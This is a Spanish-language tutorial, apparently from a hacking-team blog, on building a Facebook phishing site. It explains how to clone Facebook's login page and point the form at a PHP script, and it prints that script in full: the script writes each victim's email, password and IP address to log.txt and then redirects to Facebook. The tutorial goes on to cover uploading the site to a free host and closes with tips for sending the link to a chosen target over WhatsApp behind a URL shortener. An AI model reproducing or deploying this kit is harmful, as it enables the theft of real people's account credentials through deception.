Crear mi propio pishing para facebook con Dominio [FREE]

Crear mi propio pishing para facebook con Dominio [FREE]

Bueno pues gente desde hace tiempo que no entro a publicar , debido a varios factores :(.Además también deje de darle update a mis scripts u.u , nunca se enamore crj ajjaja .Bueno comensare.

Bueno sera facil crearlo , a continuacion comensare : 

Ingresamos a www.facebook.com normalmente como lo hacemos siempre.

Una vez aqui pulsamos la conbinacion de teclas magicas :v los cuales seria <Ctrl+S> y se nos abre una pestaña , guardamos los archivos en donde nosotros queramos , pero tenemos que editar el codigo que esta dentro de este archivo html <Facebook - Inicia sesión o regístrate.html> con el codigo fuente de la pagina de facebook.com.La copiamos toditita con <Ctrl+A> .Debido a que si no hacemos esto creo que no carga el css o lo bonito de la pagina.

Una vez realisado este primer paso , procederemos a ver como hacer que las credenciales introducidas a la pagina que subiremos luego a un hosting [FREE] nos guarde las credenciales.

Lo realizaremos mediante el uso de php, pero antes editaremos la pagina <Facebook - Inicia sesión o regístrate.html> , pueden abrirla con un block de notas o mejor aun con DreamWeaver o tambien con sublime text , que tenga un buscador.

Listo , una vez adentro de nuestro block o vim,nano,sublime text , lo que sea.Pasamos a buscar lo siguiente : [action="]

Lo que nos interesa por ahora es lo siguiente : 

action="https://www.facebook.com/login.php?login_attempt=1&amp;lwv=110"

Si desean saber algo mas podrian leer de formularios en html :D  les dejo un link ->

FORMULARIOS HTML

Una ves realizado este cambio al momento de guardarlo , guardenlo como -> "index.html"

Bueno el action yo diria que vendria a ser el que va a gestionar los datos que mandemos , por ejemplo aqui el que ta gestionando las credenciales introducidas es "login.php".

Ahora lo que haremos sera editarlo !

action="gestionar.php" <- el nombre depende como guardaron el script que gestionara las credenciales que se introduciran.

Pero que ! , que tiene ese script "gestionar.php"?

Pues el archivo "gestionar.php" tiene el siguiente codigo :

<?php
if (!empty($_POST['email']) && !empty($_POST['pass'])){
$usuario = $_POST['email'];
$contra = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$archivo = fopen('log.txt','a+');
fwrite($archivo,"Usuario : " . $usuario . "\n" . "Contraseña :" . $contra . "\n" . "Ip : " . $ip ."\n");
fclose($archivo);
header('Location : http://www.facebook.com/');
}else{
header('Location : /');
}

?>

PASARE A EXPLICAR UN POQUITO EL CODE

El primer if verifica si no estan vacios el parametro "email" y "pass" entonces ejecutara todo en cambio si esta vacio con el header lo que hace es una redireccion a la parte principal de la web "/" por eso el slash.

$usuario = $_POST['email']; <- almacena el email  

Una aclaracion el "email" diran de donde salio ? pues es del formulario que esta en la pagina.Lean formularios en html y pues lo entendera y si lo entendieron pues manitas arriba ! (y)  

Y pues asi todo , luego se realiza un uso de fwrite para crear una archivo o si ya esta creado sobre escribirlo con "a+" , lo que se almacena en dicho archivo llamado "log.txt" sera el "Usuario,Contraseña,Ip"

Ok, listo tenemos ya casi todo , ahora falta suvir a un hosting [FREE] o si desean gastar dinero compren.

Recomiendo que se creen una cuenta aqui :

www.000webhost.com/

No explicare como se crea porque , supongo que es facil -.-.
Esta seria la interfaz una ves creada la cuenta y logeados claro !

Para no alargar este post , clickeamos en "File manager" y luego en "subir archivos".

Nos saldra lo siguiente :

Como podemos observar , todo esta vacio ! lo unico que tenemos que hacer es arrastrar todos los archivos que creamos y descargamos ! a la parte blanca y listo ! se suvira automáticamente.

Y pues listo ! Tenemos todo supido al hosting !

Entramos a nuestra direccion la cual declaramos al momento de registrarnos ! 

Introducire datos al azar pa probar el pishing y pues le damos en "iniciar session".

Y luego nos vamos a el archivo log.txt en donde se almacenan las credenciales introducidas y la ip , ya se explico como se procede todo esto o como se realiza en la parte de arriba.Visualisando el archiv "log.txt":

Una recomendacion !

Si desean enviar su link a una persona en especifico usen otras redes por ejemplo whastapp y ademas pueden usar acortadores de url para que no sea posible identificar el pishing "url".Ya queda en ustedes con su flor ! saludos !

Y pues esto seria todo ! 

Saludos ! 

Atte : Rodrigo Canaza.

Team : KelvinSecurity !